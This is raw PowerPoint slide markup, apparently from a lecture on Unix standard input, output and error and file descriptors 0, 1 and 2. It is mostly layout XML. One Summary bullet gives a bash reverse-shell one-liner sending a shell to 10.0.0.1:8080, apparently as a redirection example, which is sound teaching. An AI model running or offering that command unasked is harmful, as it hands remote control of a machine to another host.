              <a:blip r:embed="rId25"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11486092" y="3278717"/>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3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11761852" y="3970277"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D27415F-F638-7958-0F63-39073B0D9045}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11744212" y="39522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5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="11660332" y="4188797"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="Ink 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C4485D2-763A-154F-9E32-3A29273361A0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId27"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="11642692" y="4170797"/>
                <a:ext cx="36000" cy="36000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95135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27</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385115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86933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>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lide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894532" y="6182876"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A55E56-C113-9D37-1CCE-5F4557CBB0E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="182846513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84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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>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idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9894532" y="6182876"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{504D91AE-24A6-F8B0-FE8E-4763B6E2E1B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33428822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37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Closeup of a keyboard">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E1CAAC-8F47-DF36-884F-032B06FEE9B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:srcRect l="10103" r="23191" b="1"/>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4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668866" y="1678666"/>
            <a:ext cx="5123515" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Standard input/output/error devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677335" y="4050831"/>
            <a:ext cx="5113217" cy="1096901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 2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633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33502" y="609600"/>
            <a:ext cx="8596668" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Isosceles Triangle 22">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idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1333502" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="93131" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="310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spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3100"/>
              <a:t>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Isosceles Triangle 24">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58254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a:xfrm>
            <a:off x="1286933" y="609600"/>
            <a:ext cx="10197494" cy="1099457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Assignment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1"/>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69EA50D0-5E99-4B50-89D5-EB025B709D2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399351286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34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normAutofit fontScale="92500"/>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 (0,1,2)!</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>DESCRIPTOR 0,1,2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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AD4FB5A9-3D63-1490-9F12-FA8A4270B582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407573" y="1392572"/>
            <a:ext cx="3251200" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96927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5</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Graphic 2" descr="Document outline">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCCEF90-E352-1AA6-AF03-BD9A49205B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7681" y="3985846"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EE24E55-EC09-A96F-1CAC-D881D36537A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="5" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1527777" y="3420776"/>
            <a:ext cx="112441" cy="642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A7166D24-8FC4-F263-22CA-7A0BD1ACF199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058723" y="3489398"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE8C9AD7-C4A6-D958-F5F0-30F414F05EC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8044405" y="1296365"/>
            <a:ext cx="2750240" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>default input and output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Straight Arrow Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9ECA26E-7BFF-984F-990C-A347AA865302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7917084" y="1696475"/>
            <a:ext cx="1502441" cy="6366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6</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myflle.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>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5387" y="2005125"/>
            <a:ext cx="914400" cy="914400"/>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682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="857247" y="5603002"/>
              <a:ext cx="402840" cy="352440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="15" name="Ink 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="848607" y="5594362"/>
                <a:ext cx="420480" cy="370080"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2092D9-41BB-35DA-110D-05E0D7227419}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="871287" y="2089762"/>
            <a:ext cx="7209000" cy="3651120"/>
            <a:chOff x="871287" y="2089762"/>
            <a:chExt cx="7209000" cy="365112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60A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="871287" y="5149402"/>
                <a:ext cx="339480" cy="317880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId8"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="862287" y="5140402"/>
                  <a:ext cx="3571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BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1264767" y="2206042"/>
                <a:ext cx="6792840" cy="2998440"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="8" name="Ink 7">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId10"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1255767" y="2197042"/>
                  <a:ext cx="6810480" cy="301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D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7918287" y="2089762"/>
                <a:ext cx="118080" cy="245520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="13" name="Ink 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId12"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7909287" y="2081122"/>
                  <a:ext cx="1357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D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1305807" y="2765842"/>
                <a:ext cx="6753240" cy="2975040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="16" name="Ink 15">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId14"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1297167" y="2756842"/>
                  <a:ext cx="6770880" cy="2992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BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7940607" y="2694922"/>
                <a:ext cx="139680" cy="95760"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="18" name="Ink 17">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId16"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7931607" y="2686282"/>
                  <a:ext cx="157320" cy="11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C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2825367" y="-49718"/>
              <a:ext cx="3240" cy="1440"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="20" name="Ink 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId18"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2816727" y="-58358"/>
                <a:ext cx="208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C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8119167" y="714922"/>
              <a:ext cx="360" cy="360"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId20"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8110527" y="705922"/>
                <a:ext cx="18000" cy="18000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301519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8</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432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5549969" y="5422203"/>
